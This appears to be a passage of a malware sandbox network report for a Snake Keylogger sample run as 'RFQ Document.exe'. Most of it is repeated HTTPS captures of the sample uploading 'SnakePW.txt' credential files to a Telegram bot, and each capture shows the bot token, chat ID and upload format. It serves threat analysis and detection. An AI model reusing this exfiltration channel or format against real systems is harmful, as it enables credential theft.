2021-09-28 05:59:08 UTC	265	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 65 35 63 64 38 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255de5cd898Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:08 UTC	266	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:08 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:08 UTC	266	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12755,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808748,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
167	192.168.2.4	49982	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:08 UTC	267	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255de7bd6f1 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:08 UTC	267	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 65 37 62 64 36 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255de7bd6f1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:08 UTC	267	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:08 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:08 UTC	268	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12756,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808748,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
168	192.168.2.4	49983	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:08 UTC	268	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255de93c063 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:08 UTC	269	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 65 39 33 63 30 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255de93c063Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:09 UTC	269	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:09 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:09 UTC	269	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12757,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808748,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
169	192.168.2.4	49984	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:09 UTC	270	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255deb05f41 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:09 UTC	270	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 65 62 30 35 66 34 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255deb05f41Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:09 UTC	271	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:09 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:09 UTC	271	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12758,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808749,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.4	49791	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:24 UTC	26	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c3d6b706 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:24 UTC	27	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 33 64 36 62 37 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c3d6b706Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:24 UTC	27	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:24 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:24 UTC	28	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12597,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808704,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
170	192.168.2.4	49988	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:09 UTC	272	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255deca8634 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:09 UTC	272	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 65 63 61 38 36 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255deca8634Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:09 UTC	272	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:09 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:09 UTC	273	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12759,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808749,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
171	192.168.2.4	49991	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:09 UTC	273	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255dee894c0 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:09 UTC	273	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 65 65 38 39 34 63 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255dee894c0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:09 UTC	274	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:09 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:09 UTC	274	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12760,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808749,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
172	192.168.2.4	49992	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:09 UTC	275	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255df063068 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:09 UTC	275	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 66 30 36 33 30 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255df063068Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
